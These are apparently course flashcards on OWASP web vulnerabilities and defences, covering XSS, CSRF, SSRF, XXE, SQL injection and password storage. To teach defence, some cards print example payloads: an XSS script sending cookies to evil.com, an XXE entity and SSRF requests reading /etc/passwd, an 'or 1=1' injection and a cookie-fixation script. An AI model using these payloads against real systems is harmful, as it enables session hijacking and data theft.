OWASP part 2 Flashcards

1
Q

Exam question:
Which security guiding principle is related to the blacklisting countermeasure?

A

Be reluctant to trust

2
Q

Exam question:
Which security guiding principles are related to the encrypt sensitive information countermeasure?

A

Remember that hiding secrets is hard

3
Q

What is the security issue of cookie-based tokens?

A

The server can only see the cookie name and value, not from which domain it was sent.

Only sees:
Cookie: NAME=VALUE

4
Q

Fill in the blank: All input is ___

A

Evil

5
Q

Which vulnerability is related to session fixation attack?

A

When a server escalates anonymous session tokens without changing their value.

6
Q

What can an attacker achieve with SQLi?

A

Modification/destruction of data

Unauthorized access to data, stealing information

Privilege escalation

Expose database structure

DoS

7
Q

What are possible countermeasures against SQLi?

A

Prepared statements, bind variables
Mitigating impact

Not recommended to only do:
- escape
- blacklist
- whitelist

8
Q

What does it mean to bind variables when mitigating SQLis?

A

To put one or more placeholders in the text of the SQL statement, then specify the variable (value to be used) for each placeholder.

9
Q

What are the 8 most common OWASP risks at this point in time?

A

More injection attacks - XSS

Broken access control - CSRF

SSRF

Security misconfiguration - XML External Entities

SW and data integrity failures - insecure deserialization

Identification and auth failure - Broken authentication

Security logging and monitoring failures - insufficient logging and monitoring

HTML security issues - Clickjacking

10
Q

What type of session management attacks can be achieved using XSS?

A

Session token theft

Session fixation

11
Q

What is XSS?

A

Can occur when JS code is sent as user input and the server does not sanitize the input but echoes it directly into the HTML page. This way, the user input is interpreted as code and executed.

12
Q

How can XSS be used to steal tokens? (Token theft)

A

An attacker finds out that http://example.com/query? is vulnerable to XSS.

The attacker knows that user A uses this page a lot.

The attacker sends the following link to the user:
http://example.com/query?name=

new Image().src = "http://evil.com/log?c=" + document.cookie;

The attacker lures the user to click this link

When the user clicks the link, the script is echoed back to the user’s browser and executed. The user’s anonymous or logged-in cookie at example.com is logged at evil.com

13
Q

How can XSS be used in session fixation attacks?

A

The attacker sends a request to example.com and receives back an anonymous token from the server.

At the same time, user A visits the same site and receives their own anonymous cookie.

Then, the attacker sends the link to A:
http://example.com/query?name=

document.cookie = "exampleSiteToken=attackersToken"

Attacker lures A to click this link

Later, A logs in to the example.com site. If the credentials are valid, the server escalates the anonymous token, which now carries the attacker's value, to a logged-in token.

The attacker can now use their token to impersonate A.

14
Q

What are some usual sources of untrusted input?

A

Query

User/profile page

Forum/Message board

Blogs

15
Q

What are the 2 types of XSS attacks?

A

Reflected XSS

Stored XSS

16
Q

What is reflected XSS?

A

JS is injected into a request

The JS code is reflected immediately in the response

17
Q

What is stored XSS?

A

Script injected into a request, then stored somewhere on the server.
Reflected repeatedly, making it more easily spread.

18
Q

How can XSS be mitigated?

A

Sanitize input data
Sanitize or escape data that is inserted into a web page.

Don’t rely on sanitizing only on the client side, as requests can be intercepted. Always sanitize on the server side as well.

19
Q

What is the flow of CSRF?

A

User logs in and gets a session ID from the server:
Cookie: sessionID=1234

The user has this session open, when visiting a new site: evil.com

This site contains an image tag that is not a real image, but instead points to the transfer page of the bank
<img></img>

When the image is reflected back to the browser, the link is executed, effectively sending a request on behalf of the user. The session ID of the user is used to complete the transaction.

The attacker needs to understand how transaction requests are made from the banking app, to be able to forge a correct request.

20
Q

What is the vulnerability that makes CSRFs possible?

A

Session management that relies only on a cookie, so the server is not able to distinguish between real and forged requests.

21
Q

How can you identify if a website is vulnerable to CSRF?

A

Identify a URL to test for CSRF. For example, test whether you are able to delete an account on a website using CSRF.

Set up a different website that contains:
<img src="http://example.com/account/del">

Create a dummy account on the original website, and log in.

With the session active, open the HTML page we just created in the same browser.

If the account was deleted, the site is vulnerable.

22
Q

How can CSRF be mitigated? (4)

A

Extra authentication when doing transactions: re-authenticate

CSRF tokens (action tokens)

SameSite cookies (browser setting): Prevents cross-site cookie usage

Referer-based validation: Verifies that the request originates from own domain.

23
Q

How can we mitigate CSRF using CSRF tokens?

A

Combine tokens in the cookie and the hidden-form field. Add action token as hidden field to genuine forms. This token should not be predictable.

When a user logs in, they get a session ID. When the user asks for the transfer form, a CSRF token is created and put in a hidden field. The form is then returned to the user.

Whenever a user issues a request from the form, both the cookie and the CSRF token are sent. The server checks both.

23
Q

What is SSRF?

A

A browser is talking to a web app that is in a trust zone with other servers or services. The server can access backend services.

The attacker sends a request to the server, which is then forwarded within the trusted zone. This request executes with the rights of the web server.

24
Q

Give 2 examples of SSRF requests

A

GET /?url=http://127.0.0.1/admin/

GET /?url=file:///etc/passwd

25
Q

How can SSRF be mitigated?

A

There is no universal fix, as it depends on the server-side implementation (application functionality and business requirements).

Some approaches:
- Whitelisting on the server side (which IP addresses can pass through)
- Handle responses from the server: e.g. make sure not to send files or passwords
- Authentication between server and internal services
- Network segregation

26
Q

What is XML External Entities in regards to security misconfigurations?

A

When we have code that requires an XML parser.

<!ENTITY name SYSTEM "URI">
!ENTITY: External entity declaration, followed by the name of the external entity
SYSTEM: Private/local
URI: Location of the variable

External entities refer to things that are used often in multiple documents in different parts of the code. They are used so that the same information does not need to be fetched multiple times from different places.

27
Q

Describe XML External Entities (XXE) attacks

A

Attack where an attacker uses malicious XML input that references an external entity, which is processed by a weakly configured XML parser.

Normal input:
Input: <test>Hello</test>
Output after XML parsing: Hello

Malicious:
Input:
<!DOCTYPE test [<!ENTITY xxefile SYSTEM "file:///etc/passwd">]><test>&xxefile;</test>
Output:
Content of passwd file

28
Q

How can XXE be mitigated?

A

Disable processing/parsing of XML external entities and DTD (Document Type Definition)

Use safe parsing libraries, or defused parsing.

29
Q

Describe Insecure deserialization in regards to Software and data integrity failures

A

Attacker can tamper with network data and inject malicious payload in a serialized data stream, e.g. SQLi payload.

Data stream:
{"ID": "user1' or 1=1", "Course": "4237", "Grade": "C"}

Server-side code:
SELECT Grade FROM student WHERE user='user1' or 1=1

30
Q

How can insecure deserialization be mitigated?

A

Don’t accept serialized objects from untrusted sources.

Integrity checks: e.g. digital signatures on serialized objects

Isolate and run code that serializes in low privilege environments

Use JSON: data-only serialization format.

31
Q

What is the difference between identification and authentication?

A

Identification: An entity telling who they are

Authentication: An entity proving/verifying that they are the identity they claim to be

32
Q

How can authentication be done?

A

3 ways:
- Something you know
- Something you have
- Something you are

33
Q

How can "Something you know" be implemented, and what are the advantages/disadvantages?

A

Password, security questions

Pros:
- Simple to implement, understand and use

Cons:
- Easy to crack and easy to forget

34
Q

How can "Something you have" be implemented, and what are the advantages/disadvantages?

A

BankID, mobile phone (1 time password)

Pros:
- Hard to crack, as long as not lost

Cons:
- The thing can be broken, stolen or forged
- If you lose the phone, you won't be able to get a one-time password for a while
- Strength of the authentication depends on the difficulty of forging

35
Q

How can "Something you are" be implemented, and what are the advantages/disadvantages?

A

Biometrics: fingerprint, palm scan, facial recognition, usage patterns, signature dynamics

Pros:
- Hard to crack
- Hard to steal (?): We leave our biometrics everywhere: fingerprints are not so hard to steal anymore, recorded voices/faces can be used to forge voice or facial recognition

Cons:
- Accuracy: False negative/False positives
- Social acceptance and privacy issues
- Key management
- Hard to replace

36
Q

How can passwords be cracked?

A

Vulnerable password storage:
Passwords are often stored in files with the following format. If an attacker gets the file, all users are compromised.
Username:password

37
Q

What is a countermeasure against password cracking?

A

Hashing: Store a hashed version of the password, not the plaintext version

In storage:
username: 923786t8732kdsbhy77832bwd11k

38
Q

Why shouldn’t the client hash the password?

A

If someone gets access to the hash database, they can send the stolen hash from the client to log in. The server would not be able to distinguish a hash submitted by the client from the entries in the database.

Never trust the client. Use other security measures to protect the password in transit, rather than client-side hashing.

39
Q

How can hashed passwords be attacked?

A

Dictionary attacks:
- Precompute the hash of a long list of common passwords (people tend to use the same passwords)
- Compare what is in the password file to these.
- This can be done very quickly offline once a password file is obtained. The comparison can be run on a very fast computer.

40
Q

What is a good defence against dictionary attack?

A

Concatenate the password with a random salt:
password || 1212

Hash this

Store the hash with the salt:
username:bufeiwoiu23390234r67823:1212

41
Q

When is salting not a good defence against dictionary attacks?

A

Against offline attacks, when the attacker gets access to the password file where both the hashed password and the salt are stored. The salt is stored in plaintext in the password file, so the attacker can just use the salt they have found and run the same attacks.

42
Q

When is salting a good defence against dictionary attacks?

A

Against online attacks, where an attacker does not have access to the record containing the salt (file or db record).

43
Q

Why do we store the salt in plaintext, and not a hashed version?

A

You need the original salt to compare the password with the stored hashed version of the password.

44
Q

What is a rainbow table?

A

The precomputed hash tables of common passwords

45
Q

Why are dictionary attacks less efficient when a salt is used?

A

Need to compute a rainbow table for every salt.

46
Q

How can we make hashed passwords even more secure?

A

Using a pepper.

A pepper is a secret value that is appended to the password before it is hashed. Unlike salts, the pepper is the same for every user and is not saved in the password file. The pepper is stored in encrypted form in another secure place.

hash(password || pepper || salt)

47
Q

What are the benefits of using peppers in password storage?

A

Makes the password longer and more complex.

Defends better against offline attacks:
- pepper is stored encrypted in another location
- If the attacker steals the password file, the pepper is still unknown

48
Q

Why is additional password security still required, besides salt and pepper?

A

Dictionary attacks are still possible; they just require more computing power

49
Q

What are some additional password security techniques?

A

Combine password security with other authentication countermeasures such as:
- Filtering
- Limiting the number of logins
- Aging password
- 2FA or multichannel auth
- Last login/protective monitoring
- 1 time password

50
Q

What is password filtering?

A

When creating a password, it must meet some minimum requirements.

Length, mix of characters, case

Measure the strength: weak, medium, strong

51
Q

What is Limiting the number of logins?

A

Lock out the user after a certain number of failed login attempts

This is inconvenient for forgetful users

52
Q

What attack can be done on a system that limits the number of logins?

A

DoS: Lockout legitimate users by attempting login until they are locked out

53
Q

What is login throttling?

A

Each time login fails, the user must wait a longer time to try again. Inconvenient, but prevents users from being locked out

54
Q

What is last login/protective monitoring?

A

Notify users of suspicious login (login date, time, location)

Educate users to pay attention

Educate users to report possible attacks

55
Q

What are aging passwords?

A

Policy that requires users to change passwords every now and then.

Cons:
- People tend to forget passwords more often
- Users find workarounds: repeat passwords, incrementing, easy to guess adjustments

56
Q

What are one-time passwords?

A

Login with different password each time

Through SMS or device (e.g. bankID)

Works as long as the user has access to the device

57
Q

What is 2FA (two-channel authentication)?

A

Combines 2 or more ways of authentication

Often:
password + 1 time passwords
password + bankID

58
Q

What is a common password attack vector?

A

Going through the forgot-password functionality. As a developer, you need to think about how this process can be made safe

59
Q

What are some common ways of doing password recovery?

A

URL tokens: Expiration date is important

PINs

Offline methods: e.g. show up at office to confirm password

Security questions (not a good idea, as much of this information is publicly available)

60
Q

What is the tradeoff in authentication?

A

Authentication security and usability

61
Q

What are CAPTCHA and reCAPTCHA?

A

Completely Automated Public Turing test to tell Computers and Humans Apart

Used to block bots. Machines are not good at solving captchas, but are getting better with machine learning.

62
Q

Name 6 authentication and password test cases

A

Testing vulnerable remember password

Testing for browser cache weakness

Testing for weak password policy

Testing for weak security question/answer

Testing for weak password change or reset functionality

Testing for weaker authentication in an alternative channel

63
Q

What is Insufficient logging and monitoring, in regards to security logging and monitoring?

A

Typical vulnerabilities: logins, failed logins, high-value transactions are not logged at all

Warning and errors generate no, inadequate or unclear log messages

Logs are not monitored properly

Logs are only stored locally. This makes it easier for an attacker to wipe the logs, and makes it difficult to monitor the logs properly.

Appropriate alerting thresholds and response escalation processes are not in place or effective.

Need to have a real-time response. Systems are weak if they are unable to detect, escalate, or alert on active threats in real time or near real time.

64
Q

What is Clickjacking in regards to HTML security issues?

A

When someone puts an invisible website on top of a website with legit content, as an iframe.
The user might think they are clicking on a button, when they actually are clicking on the iframe.

Use iframe and opacity

Top layer: What attacker wants you to click on, opacity 0
Bottom layer: What the user sees, opacity 1

65
Q

What are some countermeasures against click jacking?

A

"X-Frame-Options: deny": send this header from the legit site; it completely disables loading of the page in a frame